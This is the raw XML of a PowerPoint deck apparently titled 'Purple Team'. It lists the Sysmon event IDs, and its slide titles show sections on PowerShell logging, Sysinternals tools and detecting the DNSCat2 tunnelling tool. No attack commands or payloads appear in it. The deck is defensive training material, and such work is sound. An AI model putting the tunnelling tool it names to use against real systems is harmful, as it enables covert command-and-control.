        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F9D1D43-9890-6142-9C32-BABD902C3F1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003722" y="4231128"/>
            <a:ext cx="5663046" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Event ID 1: Process creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Event ID 2: A process changed a file creation time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Event ID 3: Network connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 4: Sysmon service state changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 5: Process terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Event ID 6: Driver loaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Event ID 7: Image loaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 9: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RawAccessRead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ProcessAccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 11: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>FileCreate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 12: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RegistryEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (Object create and delete)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6FB7064-2C7A-A040-9366-21F0F57C3B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4233156"/>
            <a:ext cx="5663046" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 13: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RegistryEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (Value Set)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 14: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RegistryEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (Key and Value Rename)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 15: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>FileCreateStreamHash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 16: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ServiceConfigurationChange</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 17: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PipeEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (Pipe Created)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 18: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PipeEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (Pipe Connected)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 19: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WmiEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WmiEventFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> activity detected)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 20: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WmiEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WmiEventConsumer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> activity detected)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 21: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WmiEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WmiEventConsumerToFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> activity detected)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 22: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>DNSEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (DNS query)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 23: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>FileDelete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (A file delete was detected)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Event ID 255: Error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6FBD6A-BBAD-3742-AD35-1384FD5A9C3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516228" y="3878739"/>
            <a:ext cx="3127664" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Sysmon Events:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195871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7946A-A158-1941-AEE4-C3A20B82FDA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples of Tools in Use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6C70E5-ED5B-514E-8684-3521A23924E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6735408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1087</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>92</Paragraphs>
  <Slides>18</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Lucida Console</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Purple Team</vt:lpstr>
      <vt:lpstr>PowerShell Logging</vt:lpstr>
      <vt:lpstr>Enable PowerShell Logging</vt:lpstr>
      <vt:lpstr>Using PowerShell Logging</vt:lpstr>
      <vt:lpstr>Sysinternals</vt:lpstr>
      <vt:lpstr>Sysinternals:  Security Tools</vt:lpstr>
      <vt:lpstr>A few tools worth using…..</vt:lpstr>
      <vt:lpstr>Installing Sysmon</vt:lpstr>
      <vt:lpstr>Examples of Tools in Use</vt:lpstr>
      <vt:lpstr>Detecting DNSCat2</vt:lpstr>
      <vt:lpstr>What Sysmon sees when DNSCat2 Client is run</vt:lpstr>
      <vt:lpstr>What Process Explorer sees when DNSCat2 Client is run</vt:lpstr>
      <vt:lpstr>What TCPView sees when DNSCat2 Client is run</vt:lpstr>
      <vt:lpstr>DNSCat2-PowerShell Client Detections</vt:lpstr>
      <vt:lpstr>Running Start-Dnscat2 from PowerShell</vt:lpstr>
      <vt:lpstr>What TCPView Sees: Start-DNSCat2</vt:lpstr>
      <vt:lpstr>What Process Explorer Sees: Start-DNSCat2</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Purple Team</dc:title>
  <dc:creator>Tony Sims</dc:creator>
  <cp:lastModifiedBy>Tony Sims</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-17T20:04:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-17T21:11:21Z</dcterms:modified>
</cp:coreProperties>
</file>